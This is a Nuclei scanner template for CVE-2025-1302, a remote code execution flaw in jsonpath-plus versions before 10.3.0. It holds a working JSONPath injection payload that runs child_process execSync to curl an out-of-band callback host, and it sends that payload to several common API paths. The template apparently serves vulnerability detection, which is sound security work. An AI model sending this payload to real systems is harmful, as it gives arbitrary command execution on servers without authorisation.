id: CVE-2025-1302 info: name: JSONPath Plus < 10.3.0 - Remote Code Execution author: Jaenact severity: critical description: | Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534] impact: | Attackers can execute arbitrary code on the system, potentially leading to full system compromise. remediation: | Update to version 10.3.0 or later. reference: - https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585 - https://github.com/JSONPath-Plus/JSONPath - https://github.com/EQSTLab/CVE-2025-1302 - https://nvd.nist.gov/vuln/detail/CVE-2025-1302 - https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-1302 cwe-id: CWE-94 epss-score: 0.10701 epss-percentile: 0.95252 metadata: verified: true max-request: 1 tags: cve,cve2025,rce,jsonpath,vkev http: - method: POST path: - "{{BaseURL}}/query" - "{{BaseURL}}/jsonpath" - "{{BaseURL}}/api/query" - "{{BaseURL}}/data" - "{{BaseURL}}/parse" - "{{BaseURL}}/filter" - "{{BaseURL}}/expression" headers: Content-Type: application/json body: | { "path": "$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]" } stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"result":' - type: word part: interactsh_protocol words: - "dns" # digest: 4b0a00483046022100cda957f27595fc7f7037dbfc46c85fcce6ae825c97824b45c689af57c299cc50022100c42e405cec5821fcf1b17a466cb3a146d305850ab0ba8fb94f73f9036133b01d:922c64590222798bb761d5b6d8e72950